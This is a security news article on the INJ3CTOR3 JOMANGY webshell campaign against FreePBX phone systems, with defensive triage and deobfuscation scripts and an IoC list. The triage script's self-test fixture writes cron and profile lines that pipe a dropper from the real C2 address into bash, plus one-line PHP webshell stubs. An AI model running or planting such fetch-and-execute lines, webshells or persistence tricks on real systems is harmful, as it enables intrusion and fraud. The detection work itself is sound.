Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

A hacker group known as INJ3CTOR3 has been running an active campaign against FreePBX systems, deploying a newly discovered PHP webshell called JOMANGY that uses six separate persistence layers to stay embedded on compromised servers.

The campaign targets internet-exposed VoIP phone systems and routes calls through them at the victims’ expense, a scheme known as toll fraud. With a target list of over 3,000 IP addresses, the operation is designed for mass automated exploitation.

FreePBX is an open-source interface used by businesses to manage phone systems built on Asterisk software. These setups handle real carrier accounts with SIP trunks that can originate actual phone calls.

For an attacker, gaining access means routing calls through premium-rate numbers they control and letting the victim’s carrier send the bill, with none of the overhead that comes with ransomware or data theft.

Analysts at Cyble (CRIL) identified the campaign and published a detailed report shared with Cyber Security News.

Researchers tied the operation with high confidence to INJ3CTOR3, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Earlier generations of the campaign were documented by Check Point Research in 2020, Palo Alto Networks Unit 42 in 2022, and Fortinet in January 2026.

Campaign Architecture (Source – Cyble)

The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave.

By May 2026, more than 700 of those systems remained infected despite five months of public disclosure. That number reflects how genuinely difficult these infections are to clear, even after the original entry point has been patched.

Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module.

Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself.

Hackers Use Six-Layer Persistence to Maintain Access

What sets this campaign apart is how its persistence was engineered. The six channels are not independent backups sitting in parallel.

Each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes.

The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper.

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight crontab copies in hidden directories, each locked with the filesystem immutable attribute (chattr +i), which silently blocks deletion even by root, and backed by two separate restore loops.

JOMANGY Webshell Operator Panel (Source – Cyble)

The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack.

The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.

Eighteen Hidden Accounts and Near-Zero Detection

The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL.

Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find.
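To turn the six channels and the account tiers described above into something you can actually check on a box, here is an added triage script, written for this article rather than taken from Cyble's tooling or the FreePBX project. It assumes stock FreePBX paths, takes the C2 address, watermark string and backdoor account names from the IoC list at the end of the article, and builds a constructed sample root for its self-test so that it runs offline. Any non-zero result should be read as confirmation that the host needs a rebuild, not as a cleanup checklist.

```shell
#!/usr/bin/env bash
# Added triage example, not code from Cyble or the FreePBX project. Walks a
# host filesystem (ROOT=/ on a live system) looking for the persistence
# channels and backdoor accounts described above. --self-test runs the same
# checks against a constructed sample root instead of the live host.
set -u
ROOT="${ROOT:-/}"
C2='45.95.147.178'                                   # primary C2 from the IoC list
WATERMARK='trace_e1ebf9066a951be519a24140711839ea'   # JOMANGY webshell watermark
HA_EXEC='var/www/html/admin/modules/freepbx_ha/license.php'
# Backdoor names from the IoC list. "asterisk" is left out because it is the
# legitimate FreePBX service account; check its shell and hash by hand.
BACKDOORS='newfpbx|newfpbxs|xhima|centos|admin|support|issabel|sangoma|emo|sugarmaint|spamfilter|asteriskuser|supports|freepbxuser|supermaint|hima'

count() { wc -l | tr -d ' '; }

# Channel 1: cron entries that re-download the dropper from the C2.
cron_hits() {
  grep -rIl -e "$C2" -e '/k.php' "$ROOT/etc/crontab" "$ROOT/etc/cron.d" \
    "$ROOT/var/spool/cron" 2>/dev/null | count
}
# Channel 2: re-infection lines injected into root's shell profiles.
profile_hits() {
  grep -lE "$C2|(curl|wget) .*k\.php" "$ROOT"/root/.bashrc "$ROOT"/root/.bash_profile \
    "$ROOT"/root/.profile "$ROOT"/etc/profile "$ROOT"/etc/bash.bashrc \
    "$ROOT"/etc/profile.d/* 2>/dev/null | count
}
# Channel 3: crontab copies stashed under hidden (dot) directories ...
hidden_copies() {
  find "$ROOT"/etc "$ROOT"/var "$ROOT"/root "$ROOT"/tmp -path '*/.*/*' -type f \
    -exec grep -l -e "$C2" -e '/k.php' {} + 2>/dev/null | count
}
# ... and files carrying the immutable attribute (chattr +i), which is what
# blocks deletion even by root. lsattr needs a real ext4/xfs filesystem, so
# this reports nothing in the self-test.
immutable_files() {
  lsattr -R "$ROOT"/etc "$ROOT"/var/www/html 2>/dev/null |
    awk 'NF == 2 && $1 !~ /\// && $1 ~ /i/ { print $2 }'
}
# Channel 4: beacon/watchdog processes (only meaningful on a live host).
proc_hits() { pgrep -fc "$C2|k\.php|wr\.php|wor\.php" 2>/dev/null || true; }
# Channel 5: webshell copies anywhere in the web tree, found by the watermark.
webshell_hits() { grep -rIl "$WATERMARK" "$ROOT/var/www/html" 2>/dev/null | count; }
# Channel 6: the PHP executor written into the high-availability module.
ha_executor() { [ -f "$ROOT/$HA_EXEC" ] && echo 1 || echo 0; }
# Accounts: extra UID-0 users, the known backdoor names, and service-tier
# accounts sharing one MD5-crypt ($1$...) hash in /etc/shadow.
uid0_accounts()    { awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$ROOT/etc/passwd" 2>/dev/null; }
suspect_accounts() { awk -F: '{ print $1 }' "$ROOT/etc/passwd" 2>/dev/null | grep -xE "$BACKDOORS" || true; }
shared_hashes()    { awk -F: '$2 ~ /^[$]1[$]/ { print $2 }' "$ROOT/etc/shadow" 2>/dev/null | sort | uniq -d | count; }

report() {
  echo "cron entries pulling dropper : $(cron_hits)"
  echo "shell profiles re-infecting  : $(profile_hits)"
  echo "hidden crontab copies        : $(hidden_copies)"
  echo "immutable files              : $(immutable_files | count)"
  echo "beacon/watchdog processes    : $(proc_hits)"
  echo "webshell copies (watermark)  : $(webshell_hits)"
  echo "freepbx_ha executor present  : $(ha_executor)"
  echo "extra UID-0 accounts         : $(uid0_accounts | tr '\n' ' ')"
  echo "known backdoor account names : $(suspect_accounts | tr '\n' ' ')"
  echo "shared MD5-crypt hashes      : $(shared_hashes)"
}

# Constructed sample root for --self-test: fake artefacts, not real samples.
build_sample_root() {
  d=$(mktemp -d)
  mkdir -p "$d/etc/cron.d" "$d/var/spool/cron" "$d/root" "$d/var/.sys" \
    "$d/var/www/html/admin/modules/freepbx_ha" "$d/var/www/html/admin/modules/phones"
  echo '*/2 * * * * root curl -s http://45.95.147.178/k.php | bash' > "$d/etc/cron.d/sys"
  echo '*/3 * * * * wget -qO- http://45.95.147.178/k.php | sh' > "$d/var/spool/cron/root"
  cp "$d/var/spool/cron/root" "$d/var/.sys/.cron.bak"
  printf 'export PATH\ncurl -s http://45.95.147.178/k.php | bash &\n' > "$d/root/.bashrc"
  echo "<?php /* $WATERMARK */ eval(\$_POST['c']); ?>" > "$d/var/www/html/admin/modules/phones/ajax.php"
  echo '<?php system($_GET["c"]); ?>' > "$d/$HA_EXEC"
  printf 'root:x:0:0::/root:/bin/bash\nasterisk:x:995:995::/var/lib/asterisk:/bin/bash\n' > "$d/etc/passwd"
  printf 'newfpbx:x:0:0::/root:/bin/bash\nspamfilter:x:1001:1001::/home/s:/bin/bash\nhima:x:1002:1002::/home/h:/bin/bash\n' >> "$d/etc/passwd"
  printf 'root:$6$r$R:0:0:99999:7:::\nspamfilter:$1$x$Y:0:0:99999:7:::\nhima:$1$x$Y:0:0:99999:7:::\nasterisk:$1$x$Y:0:0:99999:7:::\n' > "$d/etc/shadow"
  echo "$d"
}

case "${1:-}" in
  --scan)      report ;;
  --self-test) ROOT=$(build_sample_root); report ;;
  *)           echo "usage: $0 --scan | --self-test" >&2 ;;
esac
```

Run it as root with --scan on a suspect host. The web-panel tier (the freepbxusers account in the ampusers table) is not covered by the filesystem checks; query it directly against FreePBX's default database with mysql asterisk -e 'SELECT username FROM ampusers' and compare the result with the administrators you actually created.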

JOMANGY had no prior public documentation before this analysis and uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners.

At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero.
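The two-layer base64 and ROT13 wrapping is simple to undo once you know which layer is outermost, but the report does not say, so the added example below (written for this article, not Cyble's code and not derived from the JOMANGY samples) tries both orders on every long base64-looking token in a PHP file and keeps whichever decodes to text containing a PHP marker. The loader stub and payload it decodes are constructed for the demo, and the marker test ("<?php" or "eval(") is a heuristic you would widen for real samples.

```shell
#!/usr/bin/env bash
# Added example, not Cyble's tooling or JOMANGY code. Strips the two-layer
# base64/ROT13 wrapper the article describes. The report does not say which
# layer is applied first, so both orders are tried and the one that yields
# readable PHP (a "<?php" or "eval(" token) is kept.
set -u

rot13() { tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Decode one blob. Returns 1 when neither order yields PHP-looking text.
# NUL bytes from a wrong-order decode are dropped so the shell can hold it.
peel() {
  blob="$1"
  for order in b64_then_rot13 rot13_then_b64; do
    case "$order" in
      b64_then_rot13) out=$(printf '%s' "$blob" | base64 -d 2>/dev/null | rot13 | tr -d '\000') ;;
      rot13_then_b64) out=$(printf '%s' "$blob" | rot13 | base64 -d 2>/dev/null | tr -d '\000') ;;
    esac
    case "$out" in
      *'<?php'*|*'eval('*) printf '%s' "$out"; return 0 ;;
    esac
  done
  return 1
}

# Pull every long base64-looking token out of a PHP file and try to peel it.
peel_file() {
  grep -oE '[A-Za-z0-9+/]{40,}={0,2}' "$1" | while IFS= read -r blob; do
    if dec=$(peel "$blob"); then printf '%s\n' "$dec"; fi
  done
}

# Constructed sample: a harmless stand-in payload wrapped ROT13-then-base64
# (what a loader calling eval(str_rot13(base64_decode(...))) would carry) and,
# for contrast, the reverse order, to show peel() does not depend on it.
SAMPLE_PLAIN='<?php echo "constructed sample, not a real webshell"; ?>'
SAMPLE_BLOB_A=$(printf '%s' "$SAMPLE_PLAIN" | rot13 | base64 | tr -d '\n')
SAMPLE_BLOB_B=$(printf '%s' "$SAMPLE_PLAIN" | base64 | tr -d '\n' | rot13)

# Writes a constructed loader stub around SAMPLE_BLOB_A and prints its path.
make_sample_file() {
  f=$(mktemp)
  printf '<?php eval(str_rot13(base64_decode("%s"))); ?>\n' "$SAMPLE_BLOB_A" > "$f"
  printf '%s\n' "$f"
}

# Usage: peel.sh /path/to/suspicious.php (runs the constructed demo without a path)
if [ "$#" -gt 0 ]; then
  peel_file "$1"
else
  f=$(make_sample_file); peel_file "$f"; rm -f "$f"
fi
```

Point it at the surviving copies the triage turned up (for instance the ajax.php path named in the IoC list) and diff what comes out against the operator panel screenshots; identical decoded bodies across hosts are what you expect from a mass-deployed webshell.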

Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes.

Indicators of Compromise (IoCs):

Type | Indicator | Description
--- | --- | ---
IP Address | 45[.]95[.]147[.]178 | Primary C2 server (AS49870 Alsycon B.V., Netherlands)
IP Address | 45[.]234[.]176[.]202 | Prior campaign C2 (January 2026 encystPHP campaign, Brazilian infrastructure)
IP Address | 160[.]119[.]76[.]250 | Scanner/reconnaissance node in the same AS49870 allocation as the primary C2
IP Address | 169[.]150[.]218[.]33 | Operator VPN IP embedded in the wor.php ZenharR instance (Datapacket AS212238)
IP Address | 169[.]150[.]218[.]37 | Operator VPN IP embedded in the wr.php ZenharR instance
IP Address | 146[.]70[.]129[.]114 | Earlier operator VPN IP embedded in an early JOMANGY variant (M247 Europe SRL)
File Hash (MD5, partial) | b506fc82 | Stage 1 Bash dropper (23,355 bytes); 4 detections across 76 AV engines
File Hash (MD5, partial) | 100259af | Stage 2 k.php (~45 KB Bash); zero VirusTotal detections at time of analysis
File Hash (MD5, partial) | 49abb105 | Alternate k.php variant retrieved from VirusTotal (2026-04-29)
File Hash (MD5, partial) | d40180f7 | Stage 3 wr.php (27 KB Bash ZenharR dropper); zero VirusTotal detections
File Hash (MD5, partial) | 995e6304 | wor.php (13 KB Bash, parallel ZenharR dropper)
File Hash (MD5, partial) | 71d94479 | Prior campaign (January 2026) encystPHP dropper
File Hash (SHA256, partial) | 039d648b | Early JOMANGY webshell variant; VT first seen 2026-04-07
File Hash (MD5) | a8b65af6c142736ccf80420e44df240f | zen.php; assessed as ZenharR payload integrity reference
File Hash (MD5) | ec4ca4db5ec0b782e51224fa7082ac06 | Live auth token served by ask.php and _md5.php on the C2
File Hash (MD5) | b92c65af386ed772972b43cab0d55a4a | ZenharR auth hash embedded in the wor.php instance
File Hash (MD5) | bfcedbc1831779921a0ee2cfaee004f2 | Auth hash in the early JOMANGY variant (039d648b)
File Hash (MD5) | cf710203400b8c466e6dfcafcf36a411 | Third ZenharR hash observed by SANS ISC at /admin/modules/phones/ajax.php
File Hash (SHA1) | 6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9 | SHA1 password hash for the backdoor FreePBX web panel account "freepbxusers"
Watermark String | trace_e1ebf9066a951be519a24140711839ea | JOMANGY webshell watermark present in every deployed instance
Marker String | bm2cjjnRXac1WW3KT7k6MKTR | Unique marker from the January 2026 encystPHP dropper; used as a grep eviction target
URL | hxxp://45[.]95[.]147[.]178/k.php | Stage 2 dropper download URL (cron-polled every 1-3 minutes)
URL | hxxp://45[.]95[.]147[.]178/z/wr.php | Stage 3 ZenharR dropper download URL
URL | hxxp://45[.]95[.]147[.]178/z/wor.php | Parallel ZenharR dropper URL
URL | hxxp://45[.]95[.]147[.]178/z/post/root.php | Post-exploitation callback URL (root execution track)
URL | hxxp://45[.]95[.]147[.]178/z/post/noroot.php | Post-exploitation callback URL (non-root execution track)
File Name | people2.txt | C2-hosted IP inventory file containing 3,080 assessed target addresses
File Name | license.php | PHP executor written to /var/www/html/admin/modules/freepbx_ha/license.php
File Name | tryRoot1.sh | Embedded shell script that writes license.php and triggers FreePBX HA hooks
Backdoor Account | newfpbx, newfpbxs, xhima | UID-0 OS backdoor accounts created via base64-obfuscated useradd commands
Backdoor Account | centos, admin, support, issabel, sangoma, emo | Additional UID-0 OS backdoor accounts created in plaintext by Stage 1
Backdoor Account | sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint, asterisk, hima | Service-tier OS backdoor accounts sharing the same MD5-crypt password hash
Backdoor Account | freepbxusers | FreePBX web panel admin account injected into the MySQL ampusers table

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.


The post Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems appeared first on Cyber Security News.

